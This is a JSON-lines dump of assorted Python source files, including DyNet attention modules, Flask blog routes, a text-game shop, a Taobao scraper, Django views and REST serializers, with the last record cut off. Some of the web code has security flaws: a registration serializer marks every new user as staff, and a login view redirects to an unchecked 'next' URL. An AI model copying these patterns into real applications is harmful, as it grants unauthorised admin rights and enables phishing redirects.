[do]\n self.bs = [model.add_parameters(d) for d in ds[1:]]\n self.ws = [model.add_parameters((j, i)) for i, j in zip(ds, ds[1:])]\n\n\n def forward(self, x):\n for i, (b, w) in enumerate(zip(self.bs, self.ws)):\n if i:\n x = leaky_relu(x)\n x = dy.affine_transform([b, w, x])\n return x\n\nclass TreeLSTM(object):\n def __init__(self, model, dm, att_type):\n self.model = model \n self.att_type = att_type\n self.WS = [self.model.add_parameters((dm, dm), init=orthonormal_initializer(dm, dm)) for _ in \"iouf\"]\n self.US = [self.model.add_parameters((dm, dm), init=orthonormal_initializer(dm, dm)) for _ in \"iouf\"]\n self.BS = [self.model.add_parameters(dm) for _ in \"iouf\"]\n\n if self.att_type == 'att' or self.att_type == 'selfatt':\n self.attention = Attention(model, dm, dm)\n if self.att_type == 'selfatt':\n self.self_attention = Attention(model, dm, dm)\n\n\n def state(self, x, hs=None, cs=None):\n if not hs:\n # initial state\n Wi, Wo, Wu, Wf = self.WS\n bi, bo, bu, bf = self.BS\n\n i = dy.logistic(dy.affine_transform([bi, Wi, x]))\n o = dy.logistic(dy.affine_transform([bo, Wo, x]))\n u = dy.tanh(dy.affine_transform([bu, Wu, x]))\n c = dy.cmult(i, u)\n h = dy.cmult(o, dy.tanh(c))\n return h, c\n else:\n # transduce\n Ui, Uo, Uu, Uf = self.US\n bi, bo, bu, bf = self.BS\n Wi, Wo, Wu, Wf = self.WS\n\n if self.att_type == 'selfatt':\n hm = dy.concatenate_cols(hs)\n hm = self.self_attention.encode(hm)\n hm = self.attention.encode(hm, x)\n elif self.att_type == 'att':\n hm = dy.concatenate_cols(hs)\n hm = self.attention.encode(hm, x)\n else:\n hm = dy.esum(hs)\n\n i = dy.logistic(dy.affine_transform([bi, Ui, hm, Wi, x]))\n o = dy.logistic(dy.affine_transform([bo, Uo, hm, Wo, x]))\n u = dy.tanh(dy.affine_transform([bu, Uu, hm, Wu, x]))\n fs = [dy.logistic(dy.affine_transform([bf, Uf, h, Wf, x])) for h in hs]\n c_out = dy.cmult(i, u) + dy.esum([dy.cmult(f, c) for f, c in zip(fs, cs)])\n h_out = dy.cmult(o, dy.tanh(c_out))\n return h_out, c_out\n\n\nclass Attention(object):\n \"\"\"\n A module for both self attention and normal attention with key, query and value\n \"\"\"\n def __init__(self, model, dm, dk, dq=None):\n # dm = memory dimension\n # dk = key dimension\n # dq = query dimension (None for self-attention)\n dq = dq or dm\n self.w_q = model.add_parameters((dk, dq), init=orthonormal_initializer(dk, dq)) \n self.w_k = model.add_parameters((dk, dm), init=orthonormal_initializer(dk, dm))\n self.w_v = model.add_parameters((dk, dm), init=orthonormal_initializer(dk, dm))\n self.factor = dk ** 0.5\n\n def encode(self, memory, query=None):\n query = query or memory # if no query then self attention\n Q = self.w_q * query\n K = self.w_k * memory\n V = self.w_v * memory\n A = dy.softmax(dy.transpose(K) * Q / self.factor)\n out = V * A\n return out\n\n\nclass GlimpsePointer:\n def __init__(self, model, token_dim, query_dim=None):\n self.model = model\n query_dim = query_dim or token_dim\n self.att_q = self.model.add_parameters((token_dim, query_dim), \n init=orthonormal_initializer(token_dim, query_dim))\n self.att_q2 = self.model.add_parameters((token_dim, token_dim + query_dim), \n init=orthonormal_initializer(token_dim, token_dim+query_dim))\n\n def point(self, seq_vec, cand_mat):\n # combined glimpse and attend\n cand_mat_trans = dy.transpose(cand_mat)\n a = dy.softmax(cand_mat_trans * (self.att_q * seq_vec))\n cand_vec = cand_mat * a\n q = dy.concatenate([seq_vec, cand_vec])\n s = cand_mat_trans * (self.att_q2 * q)\n return s\n\n def glimpse(self, seq_vec, cand_mat, cand_mat_trans):\n a = dy.softmax(cand_mat_trans * (self.att_q * seq_vec))\n cand_vec = cand_mat * a\n return cand_vec\n\n def attend(self, seq_vec, cand_mat_trans):\n # assume the seq_vec is concatenated with cand_vec\n s = cand_mat_trans * (self.att_q2 * seq_vec)\n return s\n\n\nclass SimplePointer:\n def __init__(self, model, token_dim, query_dim=None):\n self.model = model\n query_dim = query_dim or token_dim\n self.att_q = self.model.add_parameters((token_dim, query_dim), \n init=orthonormal_initializer(token_dim, query_dim))\n\n def point(self, seq_vec, cand_mat):\n cand_mat_trans = dy.transpose(cand_mat)\n s = cand_mat_trans * (self.att_q * seq_vec)\n return s\n\nclass SelfPointer:\n def __init__(self, model, token_dim, query_dim=None):\n self.model = model\n query_dim = query_dim or token_dim\n self.att_q = self.model.add_parameters((token_dim, query_dim), \n init=orthonormal_initializer(token_dim, query_dim))\n self.self_attention = Attention(self.model, token_dim, token_dim)\n\n def point(self, seq_vec, cand_mat):\n cand_mat = self.self_attention.encode(cand_mat)\n cand_mat_trans = dy.transpose(cand_mat)\n s = cand_mat_trans * (self.att_q * seq_vec)\n return s\n\nclass BiaffineAttention:\n def __init__(self, model, token_dim, hid_dim, self_attention=False):\n self.mlp_fr = MLP(model, token_dim, hid_dim)\n self.mlp_to = MLP(model, token_dim, hid_dim)\n self.attention_fr = Attention(model, token_dim, token_dim) if self_attention else None\n self.attention_to = Attention(model, token_dim, token_dim) if self_attention else None\n self.biaffine = model.add_parameters((hid_dim+1, hid_dim+1), \n # init=dy.ConstInitializer(0.))\n init=orthonormal_initializer(hid_dim+1, hid_dim+1))\n\n def attend(self, fr_vecs, to_vecs):\n fr_mat = dy.concatenate_cols(fr_vecs)\n to_mat = dy.concatenate_cols(to_vecs)\n\n if self.attention_fr:\n fr_mat = self.attention_fr.encode(fr_mat)\n to_mat = self.attention_to.encode(to_mat)\n\n fr_mat = leaky_relu(self.mlp_fr.forward(fr_mat))\n fr_mat = dy.concatenate([fr_mat, dy.inputTensor(np.ones((1, len(fr_vecs)), dtype=np.float32))])\n to_mat = leaky_relu(self.mlp_to.forward(to_mat))\n to_mat = dy.concatenate([to_mat, dy.inputTensor(np.ones((1, len(to_vecs)), dtype=np.float32))])\n score_mat = dy.transpose(fr_mat) * self.biaffine * to_mat\n return score_mat\n\nclass BilinearAttention:\n def __init__(self, model, token_dim, hid_dim):\n self.mlp_fr = MLP(model, token_dim, hid_dim)\n self.mlp_to = MLP(model, token_dim, hid_dim)\n self.biaffine = model.add_parameters((hid_dim, hid_dim),\n # init=dy.ConstInitializer(0.))\n init=orthonormal_initializer(hid_dim, hid_dim))\n\n def attend(self, fr_vecs, to_vecs):\n fr_mat = dy.concatenate_cols(fr_vecs)\n to_mat = dy.concatenate_cols(to_vecs)\n score_mat = dy.transpose(leaky_relu(self.mlp_fr.forward(fr_mat))) * \\\n self.biaffine * \\\n leaky_relu(self.mlp_to.forward(to_mat))\n return score_mat\n\nclass PairAttention:\n def __init__(self, model, token_dim, hid_dim):\n self.mlp_fr = MLP(model, token_dim, hid_dim)\n self.mlp_to = MLP(model, token_dim, hid_dim)\n self.mlp_att = MLP(model, hid_dim*2, 1, hid_dim)\n\n def attend(self, fr_vecs, to_vecs):\n fr_vecs = [leaky_relu(self.mlp_fr.forward(f)) for f in fr_vecs]\n to_vecs = [leaky_relu(self.mlp_to.forward(t)) for t in to_vecs]\n score_mat = dy.concatenate_cols([dy.concatenate([self.mlp_att.forward(dy.concatenate([f, t]))\n for t in to_vecs])\n for f in fr_vecs])\n return score_mat\n\n\n\n\n\n\n\n","repo_name":"EggplantElf/IMSurReal","sub_path":"IMSurReal/dynet_modules.py","file_name":"dynet_modules.py","file_ext":"py","file_size_in_byte":10221,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"34"} +{"seq_id":"3437409220","text":"from flask import render_template, flash, redirect, url_for, request, abort\nfrom stamp_manager import app, db, bcrypt\nfrom stamp_manager.forms import RegistrationForm, LoginForm, UpdateAccountForm, PostForm\nfrom stamp_manager.models import User, Post\nfrom stamp_manager.data import Articles\nfrom flask_login import login_user, current_user, logout_user, login_required\nimport secrets\nimport os\nfrom PIL import Image\n\n\nArticles = Articles()\n\n\n@app.route('/')\n@app.route('/home')\ndef home():\n page = request.args.get('page', 1, type=int)\n posts = Post.query.order_by(Post.date_posted.desc()).paginate(page=page, per_page=3)\n return render_template('home.html', title=\"Home\", posts=posts)\n\n\n@app.route('/about')\ndef about():\n return render_template('about.html', title=\"About\")\n\n\n@app.route('/articles')\ndef articles():\n return render_template('articles.html', articles=Articles, title=\"Sammelgebiete\")\n\n\n@app.route('/article//')\ndef article(title):\n return render_template('article.html', title=title)\n\n\n@app.route(\"/register\", methods=['GET', 'POST'])\ndef register():\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n form = RegistrationForm()\n if form.validate_on_submit():\n hashed_password = bcrypt.generate_password_hash(\n form.password.data).decode('utf-8')\n user = User(username=form.username.data,\n email=form.email.data, password=hashed_password)\n db.session.add(user)\n db.session.commit()\n\n flash(f'Account created for {form.username.data}!', 'success')\n return redirect(url_for('login'))\n return render_template('register.html', title='Register', form=form)\n\n\n@app.route(\"/login\", methods=['GET', 'POST'])\ndef login():\n if current_user.is_authenticated:\n return redirect(url_for('home'))\n form = LoginForm()\n if form.validate_on_submit():\n user = User.query.filter_by(email=form.email.data).first()\n if user and bcrypt.check_password_hash(user.password, form.password.data):\n login_user(user, remember=form.remember.data)\n next_page = request.args.get('next')\n flash('Succesfully logged in!', 'success')\n return redirect(next_page) if next_page else redirect(url_for('home'))\n else:\n flash(f'Login not successful!', 'danger')\n return render_template('login.html', title='Login', form=form)\n\n\n@app.route(\"/logout\")\ndef logout():\n logout_user()\n return redirect(url_for('home'))\n\n# funtion to save updated picture and return filename as random hex\n\n\ndef save_picture(form_picture):\n random_hex = secrets.token_hex(8)\n # get extension from orig file\n _, f_ext = os.path.splitext(form_picture.filename)\n picture_fn = random_hex + f_ext # build new filename\n picture_path = os.path.join(\n app.root_path, 'static/pics', picture_fn) # build new filepath\n output_size = (125, 125)\n i = Image.open(form_picture)\n i.thumbnail(output_size)\n i.save(picture_path)\n return picture_fn\n\n\n@app.route(\"/account\", methods=['GET', 'POST'])\n@login_required\ndef account():\n form = UpdateAccountForm()\n if form.validate_on_submit():\n\n if form.picture.data:\n picture_file = save_picture(\n form.picture.data) # call function above\n current_user.image_file = picture_file # update picture\n current_user.username = form.username.data # update username\n current_user.email = form.email.data # update email\n db.session.commit()\n flash('Account updated', 'success')\n return redirect(url_for('account'))\n elif request.method == 'GET':\n form.username.data = current_user.username\n form.email.data = current_user.email\n\n image_file = url_for('static', filename=\"pics/\" + current_user.image_file)\n return render_template('account.html', title='Account', image_file=image_file, form=form)\n\n\n@app.route(\"/post/new\", methods=['GET', 'POST'])\n@login_required\ndef new_post():\n form = PostForm()\n if form.validate_on_submit():\n post = Post(title=form.title.data,\n content=form.content.data, author=current_user)\n db.session.add(post)\n db.session.commit()\n flash('You post has been created', 'success')\n return redirect(url_for('home'))\n return render_template('create_post.html', title='New Post', form=form, legend='New Post')\n\n\n@app.route(\"/post/\")\ndef post(post_id):\n post = Post.query.get_or_404(post_id)\n return render_template('post.html', title=post.title, post=post)\n\n\n@app.route(\"/post//update\", methods=['GET', 'POST'])\n@login_required\ndef update_post(post_id):\n post = Post.query.get_or_404(post_id)\n if post.author != current_user:\n abort(403)\n form = PostForm()\n if form.validate_on_submit():\n post.title = form.title.data\n post.content = form.content.data\n db.session.commit()\n flash('Post updated', 'success')\n return redirect(url_for('post', post_id=post.id))\n elif request.method == 'GET':\n form.title.data = post.title\n form.content.data = post.content\n return render_template('create_post.html', title='Update Post', form=form, legend='Update Post')\n\n\n@app.route(\"/post//delete\", methods=['GET', 'POST'])\n@login_required\ndef delete_post(post_id):\n post = Post.query.get_or_404(post_id)\n if post.author != current_user:\n abort(403)\n db.session.delete(post)\n db.session.commit()\n flash('Your post has been deleted', 'success')\n return redirect(url_for('home'))\n\n\n\n@app.route('/user/')\ndef user_posts(username):\n page = request.args.get('page', 1, type=int)\n user = User.query.filter_by(username=username).first_or_404()\n posts = Post.query.filter_by(author=user)\\\n .order_by(Post.date_posted.desc())\\\n .paginate(page=page, per_page=3)\n return render_template('user_posts.html', user=user, posts=posts)\n","repo_name":"WeichselRiver/StampManager","sub_path":"stamp_manager/routes.py","file_name":"routes.py","file_ext":"py","file_size_in_byte":6036,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"12072325362","text":"import varModule as var\nfrom formatModule import breakline,inbreakline,error\nimport roomModule as room\nimport fightModule as fight\nimport timeModule as time\n\ndef armoury():\n breakline()\n print(\"You step into the armoury, looking about at all of their wares, various things lining the walls, shields, maces, swords, a gruff looking man stands behind the counter, and you can hear ruslting and clanging coming from somewhere in the back. \\\"Look before you ask for anything here, we're still getting a bit set up. So we are only selling a few things.\\\" The man says as you look around. \\\"We don't want to sell everything and then not be able to get more stock. Feel free to look at what's on that board over on the far wall for what we are willing to currently sell. Also if you want to try out some of your equipment, there's a dummy over in that corner I was thinking of getting rid of you can use.\\\"\")\n print(\"\\n You may buy some equipment. (buy)\")\n print(\" You can train with the dummy. (train)\")\n print(\" You may exit the building. (exit)\")\n answer = input(\"\\nEnter command here => \")\n if answer.lower().strip() == \"exit\":\n var.doTurn = False\n room.mercantile()\n elif answer.lower().strip() == \"buy\":\n armouryStore()\n elif answer.lower().strip() == \"train\":\n var.doTurn = False\n training()\n else:\n error()\n armoury()\n\ndef armouryStore():\n inbreakline()\n print(\"Currently what the armoury will sell is quite limited.\")\n print(\"\\n You can buy (weapons)\")\n print(\" You can buy (ammunition)\")\n print(\" You can (exit) this menu.\")\n answer = input(\"\\nEnter command here => \")\n if answer.lower().strip() == \"weapons\":\n armouryStoreWeapons()\n elif answer.lower().strip() == \"ammunition\":\n armouryStoreAmmunition()\n elif answer.lower().strip() == \"exit\":\n armoury()\n else:\n error()\n armouryStore()\n\ndef armouryStoreWeapons():\n inbreakline()\n if var.hasBow == False:\n print(\"Bow = 10 unity (bow)\")\n if var.hasSling == False:\n print(\"Sling = 8 unity (sling)\")\n print(\"Chakram = 4 unity (chakram)\")\n if var.hasSword == False:\n print(\"Sword = 8 unity (sword)\")\n if var.hasMace == False:\n print(\"Mace = 10 unity (mace)\")\n print(\"Dagger = 6 Unity (dagger)\")\n print(\"You can (exit) this menu.\")\n answer = input(\"\\nEnter command here => \")\n if answer.lower().strip() == \"sling\":\n inbreakline()\n if var.hasSling == False:\n if var.unifiedCount >= 8:\n print(\"You purchase one [1] SLING.\")\n var.hasSling = True\n var.unifiedCount -= 8\n else:\n print(\"You do not have enough money to buy that!\")\n else:\n print(\"You already have a sling.\")\n armouryStoreWeapons()\n elif answer.lower().strip() == \"bow\":\n inbreakline()\n if var.hasBow == False:\n if var.unifiedCount >= 10:\n print(\"You purchase one [1] BOW.\")\n var.hasBow = True\n var.unifiedCount -= 10\n else:\n print(\"You do not have enough money to buy that!\")\n else:\n print(\"You already have a bow.\")\n armouryStoreWeapons()\n elif answer.lower().strip() == \"chakram\":\n inbreakline()\n if var.unifiedCount >= 4:\n print(\"You purchase one [1] CHAKRAM\")\n var.chakrams += 1\n var.unifiedCount -= 4\n else:\n print(\"You do not have enough money to buy that!\")\n armouryStoreWeapons()\n elif answer.lower().strip() == \"sword\":\n inbreakline()\n if var.hasSword == False:\n if var.unifiedCount >= 8:\n print(\"You purchase one [1] SWORD.\")\n var.hasSword = True\n var.unifiedCount -= 8\n else:\n print(\"You don't have enough money to buy that!\")\n else:\n print(\"You already have a sword.\")\n armouryStoreWeapons()\n elif answer.lower().strip() == \"mace\":\n inbreakline()\n if var.hasMace == False:\n if var.unifiedCount >= 10:\n print(\"You purchase one [1] MACE.\")\n var.hasMace = True\n var.unifiedCount -= 10\n else:\n print(\"You don't have enough money to buy that!\")\n else:\n print(\"You already have a mace.\")\n armouryStoreWeapons()\n elif answer.lower().strip() == \"dagger\":\n inbreakline()\n if var.unifiedCount >= 6:\n print(\"You purchase one [1] DAGGER.\")\n var.daggers += 1\n var.unifiedCount -= 6\n else:\n print(\"You don't have enough money to buy that!\")\n armouryStoreWeapons()\n elif answer.lower().strip() == \"exit\":\n inbreakline()\n print(\"Exiting the menu.\")\n armouryStore()\n else:\n error()\n armouryStoreWeapons()\n\ndef armouryStoreAmmunition():\n inbreakline()\n print(\"4 arrows = 3 unity (arrows)\")\n print(\"6 shot = 3 unity (shot)\")\n print(\"You can (exit) this menu.\")\n answer = input(\"\\nEnter command here => \")\n inbreakline()\n if answer.lower().strip() == \"arrows\":\n if var.unifiedCount >= 3:\n print(\"You purchase a bundle of arrows.\")\n var.arrows += 4\n var.unifiedCount -= 3\n else:\n print(\"You don't have the money to buy that!\")\n armouryStoreAmmunition()\n elif answer.lower().strip() == \"shot\":\n if var.unifiedCount >= 3:\n print(\"You purchase a handful of shot.\")\n var.shot += 6\n var.unifiedCount -= 3\n else:\n print(\"You don't have enough money to buy that!\")\n armouryStoreAmmunition()\n elif answer.lower().strip() == \"exit\":\n print(\"Closing the menu.\")\n armouryStore()\n else:\n error()\n armouryStoreAmmunition()\n\ndef trainingIntro():\n inbreakline()\n print(\"You are now in a mock fight with the dummy. It will not fight back, and all EXP gains will be quartered \")\n\ndef training():\n time.turnInc()\n fight.playerFightStats()\n print(\"\\n You can end your training (end)\")\n print(\" You can attack! (attack)\")\n print(\" You can use your alchemical skills! (alchemy)\")\n print(\" You can change your weapon. (weapon)\")\n answer = input(\"\\nEnter command here => \")\n fight.playerFightStats()\n if answer.lower().strip() == \"end\":\n fight.recovery()\n armoury()\n elif answer.lower().strip() == \"attack\":\n var.EXPdiluter = 4\n fight.attack()\n print(f\"\\nYou do {var.finalAttack} damage!\")\n training()\n elif answer.lower().strip() == \"weapon\":\n fight.switchWeapon()\n training()\n elif answer.lower().strip() == \"alchemy\":\n fight.alchemy()\n training()\n else:\n var.doTurn = False\n error()\n training()\n\n#GENERAL STORE\n\njustEntered = False\n\ndef generalStore():\n global justEntered\n if justEntered == True:\n breakline()\n print(f\"As you step into the general store, a bell rings, and a not two seconds later a figure is at your side. turning to look you see a glowingly happy face just about a foot away from your own. \\\"Greetings! How are you today?! {var.talkList[0]} Well either way welcome to Hrath-Ryn's General Store! I hope you can find what you need, and if you can't, {var.talkList[1]}\\\" She points to the counter where a demon leans on their elbow looking bored. He gives you a quick look and then returns to looking at the counter. \\\"He's not very good with people he doesn't know, but he's nice. He'll even jingle the bell for you!\\\" She gives a little bow and quickly bounds away behind some curtains.\")\n justEntered = False\n inbreakline()\n else:\n breakline()\n print(\"You stand in a general store. It seem s that variety of things are sold here, but only a few look useful to you right now.\")\n print(\"\\n You can buy something. (buy)\")\n print(f\" You may approach {var.talkList[2]}. (approach)\")\n print(\" You may jingle the bell on the counter. (jingle)\")\n print(\" You may exit the store. (exit)\")\n answer = input(\"\\nEnter command here => \")\n if answer.lower().strip() == \"buy\":\n generalStoreStore()\n elif answer.lower().strip() == \"approach\":\n ...\n elif answer.lower().strip() == \"jingle\":\n ...\n elif answer.lower().strip() == \"exit\":\n room.mercantile()\n else:\n error()\n generalStore()\n\n#GENERAL STORE STORE\n\ndef generalStoreStore():\n inbreakline()\n print(f\"As you browse the wares and think about your purchases, {var.talkList[2]} eyes follow you, his tails flicking about behind him, boredly fidgeting with each other.\")\n if var.flasks < 2:\n print(\"\\n Flask = 4 U= (flask)\")\n if var.pouchs < 4:\n print(\" Pill Pouch = 4 U= (pouch)\")\n print(\" You may exit this menu. (exit)\")\n answer = input(\"\\nEnter command here => \")\n if answer.lower().strip() == \"flask\" and var.flasks < 2 and var.unifiedCount > 3:\n inbreakline()\n purchased(\"flask\")\n var.flasks += 1\n var.flaskContent.append(\"EMPTY\")\n generalStoreStore()\n elif answer.lower().strip() == \"flask\" and var.flasks < 2 and var.unifiedCount < 4:\n inbreakline()\n cantPurchase(\"flask\",\"U=\")\n generalStoreStore()\n elif answer.lower().strip() == \"pouch\" and var.pouchs < 4 and var.unifiedCount > 3:\n inbreakline()\n purchased(\"flask\")\n var.pouchs += 1\n var.pouchContent.append(\"EMPTY\")\n generalStoreStore()\n elif answer.lower().strip() == \"pouch\" and var.pouchs < 4 and var.unifiedCount < 4:\n inbreakline()\n cantPurchase(\"flask\",\"U=\")\n elif answer.lower().strip() == \"exit\":\n inbreakline()\n print(\"Exiting the menu.\")\n generalStore()\n else:\n error()\n generalStoreStore()\n\n#PURCHASED\n\ndef purchased(name):\n print(f\"You purchased a {name}.\")\n\ndef cantPurchase(name,currency):\n print(f\"You do not have enough {currency} to purchase a {name}.\")\n\n#APPROACH SHO'TSAHL\nshoTalked = False\n\ndef approachShoTsahl():\n global talked\n inbreakline()\n print(f\"You walk up to {var.talkList[2]}, his tails stop fidgeting and he raises his head from his hands, still looking bored. \\\"What is it?\\\"\")\n print(f\"\\n You may talk to {var.talkList[2]} (talk)\")\n print(f\" You may look at {var.talkList[2]}'s appearance. (look)\")\n print(\" You may leave him alone. (exit)\")\n answer = input(\"\\nEnter command here => \")\n if answer.lower().strip() == \"talk\":\n ...\n elif answer.lower().strip() == \"look\":\n ...\n elif answer.lower().strip() == \"exit\":\n inbreakline()\n if shoTalked == False:\n print(f\"You hear {var.talkList[2]} mumble \\\"Why do they have to be so weird?\\\" under his breath as you walk away.\")\n else:\n print(f\"Before you turn around to leave, you hear {var.talkList[2]} say \")","repo_name":"Scribe2theFiends/Psychescape-Prog","sub_path":"mercantileModule.py","file_name":"mercantileModule.py","file_ext":"py","file_size_in_byte":11114,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"25860087099","text":"# coding: utf-8\nfrom selenium import webdriver\nimport time\n\n# 1.创建浏览器对象\ndriver = webdriver.Firefox()\n# 2.打开淘宝首页\ndriver.get('http://www.taobao.com')\n# 3.找到搜索输入框\nsearch_ele = driver.find_element_by_id('q')\n# 4.输入搜索关键词\nsearch_ele.send_keys(u'冰姨凉茶铺')\n# 5.找到搜索按钮\nsearch_btn = driver.find_element_by_class_name('btn-search')\n# 6.点击按钮\nsearch_btn.click()\n# 打开文件\nfile_handle = open('shops.txt', 'wb+')\nfor i in range(1, 3):\n print\n '正在爬取第%s页数据.......' % i\n # 让浏览器滚动,加载数据\n for x in range(1, 11, 2):\n # 暂停1秒再开始滚动\n time.sleep(0.5)\n j = x / 10.0\n # %f float小数类型的占位符\n js = 'document.documentElement.scrollTop = document.documentElement.scrollHeight * %f' % j\n # 执行js代码\n driver.execute_script(js)\n\n # 浏览器滚动结束之后,取出数据\n # 找到所有的class名称为info-cont的标签\n shops = driver.find_elements_by_class_name('info-cont')\n # for循环遍历列表,取出每一个商品信息\n for shop in shops:\n # 写入数据 编码\n file_handle.write(shop.text.encode('utf-8'))\n # 写入换行符\n # file_handle.write('\\n\\n')\n\n # 查找下一页\n next_page = driver.find_element_by_link_text('下一页')\n next_page.click()\n\n# 关闭文件\nfile_handle.close()\n","repo_name":"baozha2003/test_project","sub_path":"venv/foo/taobao.py","file_name":"taobao.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"5093809002","text":"# -*- coding: utf-8 -*-\n__author__ = 129\n__date__ = 2017 / 11 / 2\n\nimport urllib.request\n\n\ndef http_get(url):\n resp = urllib.request.urlopen(url)\n print('status code:\\t', resp.getcode())\n print('status message:\\t', resp.msg)\n print('page header:\\t', resp.headers)\n print('page content:\\t', resp.read())\n print('content:\\t',resp.read())\n\n\ndef http_post(url, data):\n resp = urllib.request.urlopen(url=url, data=data)\n\nif __name__ == '__main__':\n http_get('http://item.jd.com/5811182.html')","repo_name":"chafingdisher/web_api_py","sub_path":"com/wpsd/util/httputil.py","file_name":"httputil.py","file_ext":"py","file_size_in_byte":511,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"19660686200","text":"from django.shortcuts import render\nfrom rest_framework.views import APIView\nfrom rest_framework import generics, filters, status\nfrom rest_framework.response import Response\nfrom rest_framework.decorators import api_view\nfrom .models import Transformer\nfrom .serializers import TransformerSerializer\nfrom .signals import new_item_created\nfrom rest_framework import generics\nfrom django.db.models import Q\nfrom .models import Transformer\nfrom .serializers import TransformerSerializer\nimport pandas as pd\nfrom django.conf import settings\nfrom . import signals\n\nclass TransformerRetrieveUpdateDestroyView(generics.RetrieveUpdateDestroyAPIView):\n queryset = Transformer.objects.all()\n serializer_class = TransformerSerializer\n\n\nclass TransformerListView(generics.ListCreateAPIView):\n serializer_class = TransformerSerializer\n def perform_create(self, serializer):\n instance = serializer.save()\n new_item_created.send(sender=instance.__class__, instance=instance)\n def get_queryset(self):\n # Get latitude and longitude query parameters from the request\n sensor_dataset = pd.read_csv(settings.SENSOR_FILE)\n latitude = self.request.query_params.get('latitude')\n longitude = self.request.query_params.get('longitude')\n if latitude is not None and longitude is not None:\n try:\n latitude = float(latitude)\n longitude = float(longitude)\n except ValueError:\n return Transformer.objects.none()\n\n # Define latitude and longitude difference (approximately 2 units)\n latitude_difference = 2\n longitude_difference = 2\n\n # Calculate latitude and longitude ranges for the query\n min_latitude = latitude - latitude_difference\n max_latitude = latitude + latitude_difference\n min_longitude = longitude - longitude_difference\n max_longitude = longitude + longitude_difference\n #random\n\n # Query Transformer instances within the specified range\n queryset = Transformer.objects.filter(\n Q(latitude__gte=min_latitude) &\n Q(latitude__lte=max_latitude) &\n Q(longitude__gte=min_longitude) &\n Q(longitude__lte=max_longitude)\n )\n return_queryset = queryset\n else:\n return_queryset = Transformer.objects.all()\n for transformer in return_queryset:\n sensor_data = sensor_dataset.sample(1)\n predicted_value = signals.model.predict(sensor_data)\n if predicted_value ==1:\n transformer.fault = True\n transformer.save()\n \n for transformer in return_queryset:\n if transformer.fault == False:\n transformer.fault = 0\n if transformer.fault == True:\n transformer.fault = 1\n return return_queryset\n\n\n@api_view(['GET'])\ndef model_predict(request):\n\n predicted_result = \"\"\n return Response(predicted_result)\n ","repo_name":"NebulaAnish/Grid-Guardian","sub_path":"backend/main/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3071,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"34"} +{"seq_id":"43466096661","text":"import logging\nimport os\nimport sys\n\nfrom model.image_entry import ImageEntry\n\n\ndef renamer_service(controller) -> None:\n folder_path = controller.args.get_image_folder_path()\n updated_images = {}\n\n for date_number, image_entry in controller.selected_images.items():\n file_extension = os.path.splitext(image_entry.file_name)[-1].lower()\n if file_extension == \".jpeg\":\n file_extension = \".jpg\"\n new_file_name = (\n f\"OneShot_{image_entry.date_time.strftime('%Y%m%d%H%M%S')}{file_extension}\"\n )\n\n if image_entry.file_name != new_file_name:\n try:\n os.rename(\n f\"{folder_path}/{image_entry.file_name}\",\n f\"{folder_path}/{new_file_name}\",\n )\n updated_images[date_number] = ImageEntry(\n new_file_name,\n image_entry.date_time,\n image_entry.date_time_read_from,\n )\n logging.info(f\"Renamed '{image_entry.file_name}' to '{new_file_name}'\")\n except OSError as e:\n logging.error(f\"Failed to rename {image_entry.file_name}: {e}\")\n sys.exit(1)\n\n controller.selected_images.update(updated_images)\n controller.set_event(\"rename_finished\")\n","repo_name":"ptrLx/oneshot-import","sub_path":"src/service/renamer.py","file_name":"renamer.py","file_ext":"py","file_size_in_byte":1316,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"34"} +{"seq_id":"24817693186","text":"import itertools\nfrom collections import Counter\nfrom lib import kuzuha, regex, normalize\nfrom lib.nlp import ngram, mecab\n\n\ndef get_longest_common_substring(logs):\n ngramer = ngram.Ngramer()\n ngrams = ngramer.to_ngrams(logs, 25, 9)\n ngrams = itertools.chain.from_iterable(ngrams)\n ngram_counter = Counter(ngrams)\n\n if not ngram_counter:\n return []\n\n messages = []\n prev_count = 0\n for (message, count) in ngram_counter.most_common(1000):\n if count < prev_count:\n break\n messages.append(message)\n prev_count = count\n return sorted(messages, key=lambda x: len(x), reverse=True)\n\n\ndef cleansing(text):\n text = text.strip()\n text = text.replace('\\n', '')\n text = regex.re_a_tag.sub('', text)\n text = normalize.remove_emoticon(text)\n return normalize.normalize(text, repeat=3)\n\n\ndef respond(text, *args):\n logs = kuzuha.search(mecab.extract_word(text))\n logs = [cleansing(log.get('text', '')) for log in logs]\n for message in get_longest_common_substring(''.join(logs)):\n if message:\n yield message + '(;´Д`)'\n","repo_name":"kuhaku/atango","sub_path":"lib/dialogue/common_substr.py","file_name":"common_substr.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"34"} +{"seq_id":"27790713548","text":"from rest_framework import serializers\nfrom rest_framework.response import Response\n\nfrom django.contrib.auth import authenticate\n\nfrom .models import User ,Item, OrderItems, Order\n\nclass StringSerializer(serializers.StringRelatedField):\n def to_internal_value(self, value):\n return value\n\n\n# class StringSerializer(serializers.StringRelatedField):\n# def to_internal_value(self,value):\n# return value\nclass RegisterSerializer(serializers.ModelSerializer):\n class Meta:\n model = User \n fields = (\n 'id',\n 'username',\n 'email',\n 'password',\n 'bio'\n )\n extra_kwargs = {'password':{'write_only':'True'}}\n def create(self, validated_data):\n user = User.objects.create_user(username=validated_data['username'],email=validated_data['email'],password=validated_data['password'])\n user.bio = validated_data['bio']\n user.is_staff = True\n user.save()\n return user\n \nclass LoginSerializer(serializers.Serializer):\n username = serializers.CharField()\n password = serializers.CharField()\n\n def validate(self, data):\n user = authenticate(**data)\n if user and user.is_active:\n return user\n return serializers.ValidationError(\"Incorect Credential\")\nclass UserSerializer(serializers.ModelSerializer):\n class Meta:\n model = User\n fields = ('id','username','email', \n 'bio')\n\nclass ItemSerializer(serializers.ModelSerializer):\n class Meta:\n model = Item\n fields = (\n 'id',\n 'price',\n 'description',\n 'pic',\n 'discount_price',\n 'slug',\n 'category',\n 'label'\n 